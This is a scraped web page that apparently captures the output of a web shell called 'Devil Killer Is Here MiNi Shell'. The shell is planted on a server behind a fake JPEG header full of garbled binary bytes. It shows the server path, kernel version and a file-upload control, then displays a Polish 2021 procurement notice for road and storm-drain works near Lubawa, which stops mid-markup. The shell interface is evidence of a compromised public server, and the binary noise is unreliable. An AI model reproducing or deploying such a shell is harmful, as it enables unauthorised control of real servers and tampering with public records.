JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006675101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00066751 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa drogi powiatowej nr 1272N Rakowice – Lubawa na odc. Targowisko Dolne – Lubawa (ul. Przemysłowa)” – część I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT IŁAWSKI - POWIATOWY ZARZĄD DRÓG W IŁAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510854569</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 33A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@powiat-ilawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat-ilawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa drogi powiatowej nr 1272N Rakowice – Lubawa na odc. Targowisko Dolne – Lubawa (ul. Przemysłowa)” – część I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5859a100-bee1-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00066751</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002406/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Rozbudowa drogi powiatowej Nr 1272N Rakowice - Lubawa na odc. Targowisko Dolne - Lubawa (Ul. Przemysłowa)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> pzd@powiat-ilawski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zd_ilawa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">§ 3 ust. 3 RPRM w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zam. Pub. oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz.<br/>1320; dalej: “Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer PC lub MAC: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, system operacyjny - MS Windows 7, Mac Os x<br/>10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku<br/>Internet Explorer minimalnie wersja 10 0, włączona obsługa JavaScript, zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa według<br/>standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych<br/>przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 2.Wyk.a, przystępując do<br/>niniejszego postępowania o udzielenie zam. Pub.o: akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej oraz uznaje<br/>go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej<br/>https://platformazakupowa.pl/pn/zd_ilawa. 3.Zalecenia: Formaty plików wykorzystywanych przez wyk<br/>powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r.<br/>w sprawie ogłoszenia jednolitego tekstu rozporządzenia RM w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz min wymagań dla systemów teleinformatycznych”. Zam. rekomenduje<br/>wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip .7Z<br/>Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp<br/>.numbers .pages. Dok. złożone w takich plikach zostaną uznane za złożone nieskutecznie. Zam.<br/>zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania<br/>podpisu osobistego, który wynosi max 5MB. Ze względu na niskie ryzyko naruszenia integralności pliku<br/>oraz weryfikację podpisu, zam. zaleca, w miarę możliwości, przekonwertowanie plików składających<br/>się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach<br/>niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Zam. zaleca, aby Wyk. z odpowiednim<br/>wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania<br/>plików oferty. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za<br/>pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email.<br/>Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji. Ofertę należy<br/>przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia<br/>publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania<br/>ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków.<br/>Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. Jeśli<br/>wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze<br/>skompresowanych plików. Zam. rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem<br/>czasu. Zam. zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem<br/>kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z<br/>koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT4A.260.17.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Rozbudowa drogi powiatowej nr 1272N Rakowice – Lubawa na odc. Targowisko Dolne – Lubawa (ul. Przemysłowa)” – część I<br/> Przedmiot zamówienia nazwany jest w dalszej części SWZ „obiektem” lub „przedmiotem zamówienia”.<br/>1.	Przedmiot zamówienia obejmuje w szczególności:<br/>W ramach zadania planuje się budowę sieci kanalizacji deszczowej na odc. Targowisko Dolne – Lubawa (ul. Przemysłowa) zgodnie z załączonym planem orientacyjnym. Inwestycja w ciągu DP 1272N znajduje się na terenie Gminy Lubawa, powiat iławski. Budowa sieci kanalizacji deszczowej dla zadania I polega na wybudowaniu wylotu (wylot B) kanalizacji deszczowej tj. od strony Targowiska (D46 + Sep + wylot) oraz przebudowę przepustu pod drogą w km 0+390,70 dokumentacji projektowej, ułożenie nowej konstrukcji nad przepustem.<br/>Zakres zamówienia dla części I obejmuje:<br/>a)	opracowanie i zatwierdzenie projektu organizacji ruchu na czas prowadzenia robót przez Starostę iławskiego w Wydziale Komunikacji Starostwa Powiatowego w Iławie, ustawienie na okres inwestycji stosownego oznakowania na czas prowadzenia robót; <br/>b)	zawiadomienie gestorów sieci o zamiarze rozpoczęcia prac podając przy zgłoszeniu nr uzgodnienia oraz przestrzeganie przez wykonawcę/podwykonawcę warunków uzgodnienia. Po zakończeniu prac zgłosić do odbioru<br/>c)	roboty przygotowawcze, pomiarowe, rozbiórkowe;<br/>d)	roboty ziemne;<br/>e)	budowa separatora, osadnika oraz kanałów z rur PP i PVC, wylot kanalizacji deszczowej<br/>f)	przebudowa przepustu pod drogą dł. 20 mb i średnicy 80 cm, <br/>g)	wbudowanie podbudowy oraz w-wy odsączającej (nad przepustem);<br/>h)	ułożenie nawierzchni z betonu asfaltowego (nad przepustem);<br/>i)	roboty wykończeniowe;<br/>j)	stałą obsługę geodezyjną oraz wykonanie geodezyjnego pomiaru powykonawczego <br/>(3 egz.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w § VIII SWZ, oraz spełniają określone przez Zamawiającego warunki<br/>udziału w postępowaniu. 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy<br/>spełniają warunki dotyczące:1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.2) uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:Zamawiający nie stawia warunku w powyższym zakresie.3) sytuacji ekonomicznej lub<br/>finansowej: Zamawiający nie stawia warunku w powyższym zakresie.4) zdolności technicznej<br/>lub zawodowej:4.1) doświadczenie zawodowe: a) dla uznania, że Wykonawca spełnia warunek<br/>posiadania wiedzy i doświadczenia Zamawiający żąda by Wykonawca wykazał, iż w okresie<br/>ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed<br/>upływem terminu składania ofert ukończył realizację minimum jednej usługi podobnej do objętej<br/>przedmiotem zamówienia.b) w przypadku wykonawców występujących wspólnie, o których<br/>mowa w art. 58 ust. 1 ustawy Pzp w celu wykazania spełniania warunku dotyczącego<br/>doświadczenia zawodowego, wykonawca musi wykazać, że co najmniej jeden z podmiotów<br/>wspólnie ubiegających się o udzielenie zamówienia zrealizował wymagane roboty budowalne,<br/>zgodnie z zasadami określonymi w lit. a);c) jeżeli Wykonawca polega na zdolnościach<br/>technicznych lub zawodowych innego podmiotu, na zasadach określonych w art. 118 ust. 1<br/>ustawy Pzp, w celu wykazania spełniania warunku dotyczącego doświadczenia zawodowego,<br/>wykonawca musi wykazać, że podmiot ten zrealizował wymagane roboty budowlane, zgodnie z<br/>zasadami określonymi lit. a);d) w przypadku, gdy w zadaniu przedstawionym przez wykonawcę<br/>jako spełniające warunek, rozliczenie pomiędzy wykonawcą a zamawiającym za wykonane<br/>zamówienie zostało dokonane w innej walucie niż w złotych polskich, wykonawca (dla celu<br/>oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż w złotych<br/>polskich – na podstawie średniego kursu złotego w stosunku do walut obcych określonego w<br/>tabeli kursów A średnich walut obcych Narodowego Banku Polskiego na dzień zamieszczenia<br/>ogłoszenia o zamówieniu z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych, e) jeżeli wykonawca powołuje się na doświadczenie w realizacji robót<br/>wykonywanych wspólnie z innymi wykonawcami, wykonawca musi wskazać, iż bezpośrednio<br/>uczestniczył w wykonywaniu wymaganych robót budowalnych, zgodnie z zasadami określonymi<br/>w lit. a)f) ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z<br/>Załącznikiem nr 2A do SWZ, o którym mowa w §IX ust. 1 SWZ, które stanowi wstępne<br/>potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie<br/>dokumentu, o którym mowa w §IX ust. 4 pkt 2 lit. a) SWZ, złożonego na wezwanie<br/>Zamawiającego, przez wykonawcę, którego oferta została najwyżej oceniona, tj. wykazu<br/>wykonanych robót. Do przedmiotowego wykazu (załącznika nr 3 do SWZ) należy dołączyć<br/>dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty; 4.2) kadra<br/>techniczna: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czas realizacji<br/>zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych<br/>niezbędnych do wykonania zamówienia, tj.:a) kierownikiem budowy w specjalności drogowej<br/>pełniącym jednocześnie rolę kierownika robót. Minimalne wymagania: posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej<br/>do kierowania robotami budowlanymi bez ograniczeń lub inne uprawnienia umożliwiające<br/>wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym<br/>uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie<br/>przedmiotowego zamówienia oraz co najmniej 3 - letnie doświadczenie w kierowaniu robotami<br/>drogowymi.b) ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie<br/>z Załącznikiem nr 2A do SWZ, o którym mowa w §IX ust. 1 SWZ, które stanowi wstępne<br/>potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie<br/>dokumentu, o którym mowa w §IX ust. 4 pkt 2 lit. b) SWZ, złożonego na wezwanie<br/>Zamawiającego przez wykonawcę, którego oferta została najwyżej oceniona (zgodnie z<br/>załącznikiem nr 4 do SWZ). Zamawiający określając wymogi dla osób w zakresie posiadanych<br/>uprawnień dopuszcza odpowiadające im ważne uprawnienia, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia nabyte w<br/>innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach<br/>członkowskich Europejskiego porozumienia o wolnym Handlu (EFTA) - stronach umowy o<br/>Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, zgodnie z art. 12a ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/>wówczas wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i<br/>biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni<br/>tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego<br/>zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez<br/>Zamawiającego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać,<br/>że łącznie spełniają w/w warunek.. Zamawiający informuje, że wymaga, aby osoby wskazane w<br/>załączniku nr 4 do SWZ brały bezpośredni udział w wykonywaniu zamówienia.4.3) potencjał<br/>techniczny: Zamawiający nie stawia warunku w powyższym zakresi <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr<br/>2A do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia<br/>zgodnie z Załącznikiem nr 3 i 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy w sytuacjach wymienionych w istotnych<br/>postanowieniach umowy § 11. Wszystkie postanowienia § 11 stanowią katalog zmian, na które<br/>Zamawiający może wyrazić zgodę. Zmiany te nie stanowią jednocześnie zobowiązania<br/>Zamawiającego do wyrażenia takiej zgody. W przypadku każdej zmiany, o której mowa powyżej<br/>po stronie wnoszącego propozycje zmian leży udokumentowanie powstałych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 